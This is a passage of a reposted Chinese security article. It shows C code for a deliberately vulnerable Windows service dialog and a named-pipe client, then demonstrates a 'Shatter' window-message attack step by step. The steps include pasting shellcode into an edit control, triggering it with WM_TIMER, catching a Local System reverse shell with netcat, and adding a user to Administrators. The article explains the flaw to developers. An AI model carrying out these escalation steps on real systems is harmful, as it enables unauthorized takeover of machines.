DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam){DlgParam* l_pDlgParam = (DlgParam*) lParam;CHAR tempBuf[SIZEOFBUF];switch (uMsg){case WM_INITDIALOG:{HWND hNumVisit = GetDlgItem(hwnd, IDC_NUMHIT);/*限定Edit Control的尺寸(Size)為3*/SendMessage( hNumVisit, EM_LIMITTEXT, (WPARAM) 3, (LPARAM)0);_itoa(l_pDlgParam->numOfHit, tempBuf,10);SendMessage(hNumVisit, WM_SETTEXT, (WPARAM) 0,(LPARAM)tempBuf);HWND hMsg = GetDlgItem(hwnd, IDC_MSG);/*限定Edit Control的尺寸(Size)為40*/SendMessage( hMsg, EM_LIMITTEXT, (WPARAM) SIZEOFBUF, (LPARAM)0);SendMessage( hMsg, WM_SETTEXT, (WPARAM) 0, (LPARAM) l_pDlgParam->msg ); SetForegroundWindow(hwnd);return FALSE;}case WM_COMMAND:{switch (LOWORD(wParam)){case IDC_OK:EndDialog(hwnd, IDC_OK);return FALSE;default:return FALSE;}}}return FALSE;}<==============================================================>下面是程序Client.c，非常簡單，它的功能僅僅是向“\\.\pipe\simple”發(fā)送幾個字節(jié)：<==========================Client==============================>// client.cpp : Defines the entry point for the console application.//#include #include #include #include int main(int argc, char* argv[]){char inbuf[80];char outbuf[80];DWORD bytesRead;BOOL ret;LPSTR lpszPipeName = "\\\\.\\pipe\\simple";LPSTR lpszString = "World";strcpy( outbuf, lpszString );ret = CallNamedPipeA(lpszPipeName,outbuf, sizeof(outbuf),inbuf, sizeof(inbuf),&bytesRead, NMPWAIT_WAIT_FOREVER);if (!ret) {printf("client: CallNamedPipe failed for %d\n", GetLastError());exit(1);}printf("client: received: %s\n", inbuf);return 0;}<==============================================================>FOON編寫了一個攻擊工具Shatter，大家可以參考他的文章來使用這個工具，而且他的網(wǎng)站上還有Shatter的源程序。這個程序?qū)ｉT攻擊象SimpleService這樣會創(chuàng)建Window的服務(wù)進程，它首先把Window中Edit Control的尺寸(Size)擴大，然后把可執(zhí)行的黑客碼沾貼到Edit中，這樣就把黑客碼拷貝到這個Window進程的內(nèi)存中了----很Cool吧！接下來我們就要尋找黑客碼在內(nèi)存中的地址，F(xiàn)OON是用Windbg去尋找這個地址的，詳情請參考他的文章。最后Shatter向Window進程發(fā)送一個定時執(zhí)行Message----“WM_TIMER”，迫使Window進程執(zhí)行剛才拷貝進去的黑客碼。這個黑客碼是根據(jù)jill的黑客碼改編而成，它產(chǎn)生一個遠(yuǎn)程的cmd shell聯(lián)結(jié)回到Client機器上，所以我們可以用鼎鼎有名的netcat程序與它聯(lián)絡(luò)。我現(xiàn)在來演示一下使用Shatter攻擊SimpleService的過程，看看普通用戶“moda”是如何通過Shatter提升權(quán)限的：先以普通用戶“moda”登錄，看看本地Administrators組當(dāng)前的成員：Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.D:\MyJob\tool\netcat>net localgroup administratorsAlias name administratorsComment Administrators have complete and unrestricted access to the Members-----------------------------------------------------------------------------AdministratorThe command completed successfully.本地Administrators組只有Administrator一個成員。我們試一下能不能把“moda”加入到本地Administrators組。D:\MyJob\tool\netcat>net localgroup administrators /add modaSystem error 5 has occurred.Access is denied.很慘呀，得了一個“Access is denied.”的錯誤。下面運行程序Client，向SimpleService發(fā)送幾個字節(jié)，於是SimpleService在普通用戶“moda”的Desktop上產(chǎn)生一個對話框：這個對話框上有兩個Edit Controls，一個對應(yīng)著“Number Of Hit”，這里輸出SimpleService的Named Pipe被訪問的次數(shù)；一個對應(yīng)著“Message Back”，這里輸出SimpleService的Message。這兩個Edit都可以被攻擊利用，不過我這里以“Message Back”的Edit為例。讓我們運行FOON的攻擊程序Shatter：第一步：我們需要擴大Edit的尺寸(Size)。大家從SimpleService的源程序中可以看到，“Message Back”的Edit只允許40個char，而jill的黑客碼顯然超過了這個長度，所以我們就通過Shatter向這個Edit的柄Handler發(fā)送EM_SETLIMITEXT，把它的尺寸擴大到0xffffffff(見下圖)。第二步：把FOON改編的jill黑客碼拷貝到Clipboard上，然后往Edit發(fā)送WM_PASTE，你可以看到Edit中馬上堆積了一長串亂七八糟的字符，這就是jill黑客碼。第三步：利用Windbg去尋找jill黑客碼在Window內(nèi)存中的地址，這個過程FOON已經(jīng)講得很清楚了，所以就不用我羅嗦了。在dallas上我得到的地址是在0x1389c0附近。第四步：另外打開一個Dos窗口運行netcat，我們準(zhǔn)備與打入敵營的偵察兵jill聯(lián)絡(luò)：D:\MyJob\tool\netcat>D:\MyJob\tool\netcat>nc -lp 123第五步：向Edit發(fā)送WM_TIMER，讓W(xué)indow進程跳去執(zhí)行從0x1389c0開始的黑客碼。你馬上就能看到netcat開始收到了jill發(fā)回來的內(nèi)容，它輸出一些版權(quán)信息。D:\MyJob\tool\netcat>D:\MyJob\tool\netcat>nc -lp 123Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-1999 Microsoft Corp.第六步：現(xiàn)在你就可以通過netcat與Window進程中的cmd Shell聯(lián)系，可以向它發(fā)送命令，從它那里得到命令運行結(jié)果。這個cmd Shell具有Local System的權(quán)限，所以我們可以輕易地把普通用戶“moda”加入到本地Administrators組中：D:\WINNT\system32>net localgroup administrators /add modanet localgroup administrators /add modaThe command completed successfully.D:\WINNT\system32>net localgroup administratorsnet localgroup administratorsAlias name administratorsComment Administrators have complete and unrestricted access to the Members-----------------------------------------------------------------------------AdministratormodaThe command completed successfully.D:\WINNT\system32>D:\WINNT\system32>以上就是我演示Microsoft這個缺陷的過程，雖說我有意把SimpleServic設(shè)計得易于黑客攻擊，但實際上還有不少的流行的程序也是犯了同樣的錯誤，象FOON文章中提及的Network Associates VirusScan v4.5.1, 還有我最喜歡用的WinVNC等等，它們都在普通用戶的Desktop上創(chuàng)建了一個具有Local System權(quán)限的Window。各位，編程序時要記住不要在阿貓阿狗的Desktop上創(chuàng)建Window??！如果你給它們機會，阿貓阿狗也會成精的！結(jié)尾的話：提升權(quán)限的方法還有很多種，比如說可以直接用破密碼的軟件來獲得Administrator的密碼、可以利用系統(tǒng)進程緩沖區(qū)溢出來運行更高權(quán)限的黑客碼等等，我這里只是掛一漏萬地介紹其中幾個。原作者：不詳來 源：不詳=========================文章類型:轉(zhuǎn)載 提交:№哈迪嘶№ 核查:NetDemon

最新評論